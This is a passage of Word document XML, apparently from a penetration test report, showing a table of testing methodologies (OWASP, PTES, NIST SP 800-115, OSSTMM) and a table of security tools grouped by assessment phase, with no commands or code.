            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58A3A797" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A comprehensive guide for testing web applications against the OWASP Top 10 vulnerabilities, including SQL Injection, XSS, and CSRF.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="127E0740" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3E015A12" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54E93AB5" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The Penetration Testing Execution Standard, which provides structure and consistency in the execution of penetration tests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="1AB009D0" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="07E8DF65" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NIST SP 800-115</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BCEE190" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A technical guide for information security testing, particularly useful for network vulnerability assessments and security testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="26D22122" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6E752263" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OSSTMM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1EB52827" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Open Source</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Security Testing Methodology Manual, which ensures a formal and measurable approach to security testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="664DDB55" w14:textId="229B4BA1" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5"/>
    <w:p w14:paraId="4940F005" w14:textId="459A31B0" w:rsidR="00037BB4" w:rsidRDefault="00037BB4" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="0F8D9502">
          <v:rect id="_x0000_i1273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48342069" w14:textId="3C6DC3F5" w:rsidR="00037BB4" w:rsidRDefault="00037BB4" w:rsidP="003D0BA5"/>
    <w:p w14:paraId="3FF529D3" w14:textId="21376871" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00037BB4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="tools-used"/>
      <w:bookmarkStart w:id="77" w:name="_Toc178498981"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="3B525BFE" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Various industry-standard tools were employed during the assessment to perform both manual and automated testing. These tools are categorized based on their function and scope of use.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18"/>
        <w:gridCol w:w="7132"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0BA5" w14:paraId="0CB73B02" w14:textId="77777777" w:rsidTr="00211D1D">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619FFF08" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5207B4FD" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="3FAB869C" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6C5F812F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26EBD087" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shodan</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Google Dorks</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>theHarvester</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sublist3r</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DNSRecon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="772F7218" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3257F806" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scanning &amp; Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D2C07D" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OWASP ZAP</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SSLscan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nessus</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="5E3B63DC" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7238F821" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E93FC1B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite Pro</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>XSSer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NoSQLMap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Commix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="33187E89" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2772D6C6" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA63A53" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Empire</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cobalt Strike</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="084BE50A" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4DBB1553" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Password Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2DFCE7" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>John the Ripper</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="4B466B41" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="629E702C" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
